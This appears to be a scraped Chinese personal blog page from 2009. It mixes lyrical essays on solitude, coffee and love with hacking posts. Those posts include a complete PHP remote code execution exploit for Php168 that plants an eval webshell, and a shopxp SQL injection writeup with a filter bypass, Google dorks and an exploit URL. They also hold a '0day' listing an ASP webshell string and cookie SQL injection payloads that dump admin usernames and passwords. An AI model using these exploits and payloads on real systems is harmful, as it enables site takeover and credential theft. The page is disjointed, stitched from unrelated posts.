体会孤独已关闭评论 有时候喜欢一个人静静的呆着,默默的喝着酒.喜欢就这样孤独的活着,人本来就是孤独的,也许你会说孤独的人是可耻的,但我更喜欢孤独带给我有种落漠而苍凉的感觉,让自己时刻都能享受到那种独处的快乐.
我不喜欢在一个地方呆太久,我喜欢流浪,喜欢从一个陌生的地方到另一个陌生的地方,喜欢做一个陌生城市的匆匆过客,看着陌生的城市陌生的人群陌生的面孔心中那种释然的感觉让我喜欢,体会孤独,体会狂野.这是我所向往的所追求的.
我不抽烟,而且讨厌别人抽烟.但是我昨天却做了一件令自己讨厌的事,陪一个女人抽了一包烟.体会了一下所谓抽烟的感觉,当我点燃第一支烟,看着忽明忽暗的烟火,让我想起生命的短暂和匆匆,但在这短暂和匆匆的一瞬间仿佛自己在燃烧自己,使自己发挥出最大的力量直到灰飞烟灭.犹如飞蛾扑火,明知道是死但还是要继续下去.这正附和了人生的真谛,人从出生那一刻起就一步步的在走向死亡.
Windows 7 / Server 2008R2 Remote Kernel Crash已关闭评论 This bug is a real proof that SDL #FAIL
The bug trigger an infinite loop on smb{1,2}, pre-auth, no credential needed…
Can be trigered outside the lan via (IE*, over layer 5..)
The bug is so noob, it should …
Php168一个很早的漏洞的EXP已关闭评论 作者:puret_t
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 |
利用代码: <?php print_r(' +---------------------------------------------------------------------------+ Php168 <= v2008 remote code execution exploit by puret_t mail: puretot at gmail dot com team: <a href="http://www.wolvez.org/">http://www.wolvez.org</a> dork: "Powered by PHP168" +---------------------------------------------------------------------------+ '); /** * works regardless of php.ini settings */ if ($argc < 3) { print_r(' +---------------------------------------------------------------------------+ Usage: php '.$argv[0].' host path host: target server (ip/hostname) path: path to php168 Example: php '.$argv[0].' localhost /php168/ +---------------------------------------------------------------------------+ '); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $cmd = 'makehtml=1&chdb[htmlname]=${${fputs(fopen(chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(119).chr(111).chr(108).chr(118).chr(101).chr(122).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(93).chr(41).chr(63).chr(62).chr(112).chr(117).chr(114).chr(101).chr(116).chr(95).chr(116))}}'; $shell = 'http://'.$host.$path.'cache/wolvez.php'; /** * wolvez.php has this code: * <?eval($_POST[c])?> */ send($cmd); if (!file_get_contents($url) && file_get_contents($shell) == 'puret_t') exit("Expoilt Success!\nView Your shell:\t$shell\n"); else exit("Exploit Failed!\n"); function send($cmd) { global $host, $path; $message = "POST ".$path."digg.php HTTP/1.1\r\n"; // $message = "POST ".$path."login.php HTTP/1.1\r\n"; // $message = "POST ".$path."search.php HTTP/1.1\r\n"; // $message = "POST ".$path."sendpwd.php HTTP/1.1\r\n"; // $message = "POST ".$path."showsp.php HTTP/1.1\r\n"; $message .= "Accept: */*\r\n"; $message .= "Referer: <a href="http://$host$path/r/n">http://$host$path\r\n</a>"; $message .= "Accept-Language: zh-cn\r\n"; $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; $message .= "Host: $host\r\n"; $message .= "Content-Length: ".strlen($cmd)."\r\n"; $message .= "Connection: Close\r\n\r\n"; $message .= $cmd; $fp = fsockopen($host, 80); fputs($fp, $message); $resp = ''; while ($fp && !feof($fp)) $resp .= fread($fp, 1024); return $resp; } ?> |
咖啡和爱情已关闭评论 卖咖啡的人挺会起名字的,有了咖啡,还得有咖啡伴侣。我曾经好奇地尝过没冲的咖啡,特别的苦;也尝了“伴侣”,没什么味道,远不如它那白花花的样子诱人。可把他们搀和在一起,用水轻轻地勾兑居然是那么的香醇。
我在单身的时候喝咖啡喝得挺凶,总喜欢端着杯子瞎琢磨一气,能够排遣寂寞,也能假装有点“家”的感觉,安慰自己一下。想来想去,竟然还悟出点儿道理。单身男人原来就是咖啡粉末,单身女人是咖啡伴侣,两个人搅和在一起就成了婚姻。冲得好了,完全融合在一起,就会散发出香味;搭配得出了问题,总有些东西漂在上面,不好看,喝起来也略带着点儿苦味。爱情就是个杯子,提供个容器,让男人和女人重新活一回。不过这个杯子也没配小勺,谁都不可能非把两个人搅和在一起,别人看着着急也没有办法。只能靠相互的融合力,让这本来很苦的生活散出点香味来。
一首诗曾说:“此情可待成追忆,只是当时已惘然。”我又得到了一些启示,如果把两个人放进爱情的杯子要靠缘分的话,那能够让两个人融合到一起的水,原来叫“宽容”。对于没有勺子搅拌的咖啡来说,这似乎决定了最后的味道。有一次我在另一个朋友家喝了一杯咖啡。那是一杯用全套专用咖啡用具冲的咖啡。主人非常耐心地用小勺轻轻搅拌,生怕有点不均匀的颗粒。结果咖啡上没有一点乱七八糟的粉末,味道很香,让我留恋不已。 coffee的伴侣在哪里…
shopxp网上购物系统v7.4 SQL注入漏洞已关闭评论 问题文件:xpCatalog_xpDesc.asp,xpCatalog_xpsmall_Desc.asp
问题代码:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 |
<% dim shopxpbe_id, anclassname, shopxpse_id, nclassname dim totalPut dim CurrentPage, TotalPages if request("shopxpbe_id")<>"" then shopxpbe_id=request("shopxpbe_id") else shopxpbe_id=0 end if if request("shopxpbe_id")="" then shopxpbe_id=1 end if if not isempty(request("page")) then currentPage=cint(request("page")) else currentPage=1 end if set rs=server.createobject("adodb.recordset") rs.open "select * from shopxp_btype where shopxpbe_id="&shopxpbe_id,conn,1,1 anclassname=rs("shopxpbe_name") rs.close %> |
并没有对shopxpbe_id进行整形判断。下面在说说他的防注入系统。好像是网上的枫叶防注入。看代码吧:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
Dim Fy_Url,Fy_a,Fy_x,Fy_Cs(),Fy_Cl,Fy_Ts,Fy_Zx Fy_Cl = 2 '处理方式:1=提示信息,2=转向页面,3=先提示再转向 Fy_Zx = "../" '出错时转向的页面 On Error Resume Next Fy_Url=Request.ServerVariables("QUERY_STRING") Fy_a=split(Fy_Url,"&") redim Fy_Cs(ubound(Fy_a)) On Error Resume Next for Fy_x=0 to ubound(Fy_a) Fy_Cs(Fy_x) = left(Fy_a(Fy_x),instr(Fy_a(Fy_x),"=")-1) Next For Fy_x=0 to ubound(Fy_Cs) If Fy_Cs(Fy_x)<>"" Then If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 Or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then Select Case Fy_Cl 省略部分代码 |
这个防注入系统在网上貌似很火,但是他防的是有问题的。关键是这句,Fy_Url=Request.ServerVariables(“QUERY_STRING”),Request.ServerVariables得到的数据是原样的,并不会进行URL解码。这也就导致可以进行URL编码绕过这个防注入。以下是lake2对这段代码的分析:
“它的思路就是先获得提交的数据,以“&”为分界获得并处理name/value组,然后判断value里是否含有定义的关键字(这里为求简便,我只留下了“and”),有之,则为注射。乍一看去,value被检查了,似乎没有问题。呵呵,是的,value不会有问题,可是,name呢?
它的name/value组值来自于Request.ServerVariables(“QUERY_STRING”),呵呵,不好意思,这里出问题了。Request.ServerVariables(“QUERY_STRING”)是得到客户端提交的字符串,这里并不会自动转换url编码,哈哈,如果我们把name进行url编码再提交的话,呵呵,那就可以绕过检查了。比如参数是ph4nt0m=lake2 and lis0,此时程序能够检测到;如果提交%50h4nt0m=lake2 and lis0(对p进行url编码),程序就会去判断%50h4nt0m的值,而%50h4nt0m会被转换为ph4nt0m,所以%50h4nt0m值为空,于是就绕过了检测。
等等,为什么既然name不解码可以绕过检查而value就不能绕过呢?因为value的值取自Request(Fy_Cs(Fy_x)),这个服务器就会解码的。
程序怎么改进呢?只要能够得到客户端提交的数据是解码后的就可以了,把得到name的语句改为For Each SubmitName In Request.QueryString就可以了。”
下面说下利用:
|
1 2 3 4 |
Google:inurl:xpCatalog_xpDesc.asp?action_key_order=big inurl:Catalog_Desc.asp?action_key_order=big (这个貌似是商业版的) |
构造如下地址:
|
1 2 3 |
http://www.xxx.com/xpCatalog_xpDesc.asp?action_key_order=big&shopxpbe_%69d=79 (对i进行URL编码) |
交给工具 手动添加表名:shopxp_admin 和shop_admin(商业版的)
默认后台是 admin_shopxp 或者admin
南方数据0DAY已关闭评论 南方数据的0DAY,具体怎么利用各位看官自己研究吧!
代码:
inurl:Shownews.asp?相关评论 发表评论: 呢称:评论
|
1 2 3 4 5 |
"%><%eval request("#")%><%' javascript:alert(document.cookie="id="+escape("id")) javascript:alert(document.cookie="id="+escape("111 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin")) |
秋天怎么还不来
花儿怎么还不开
赶快赶快让花儿开
好结出果儿来
我欠下了好多的债
我欠下了好多的爱
我欠下的债和欠下的爱
怎么去交代
谁和我一样还在等待
还在徘徊
别像我这样不敢面对自己的未来
我的花儿还不开
没有果儿来让我摘
我的花儿还不开
没有果儿来让我摘
每次听这首歌都有特别的感触,想想自己这二十多年,真的欠下特别多的债和爱,而且还在一直增加中。什么都不说了,所有的一切都在我的心里。
13 11月 2009 |
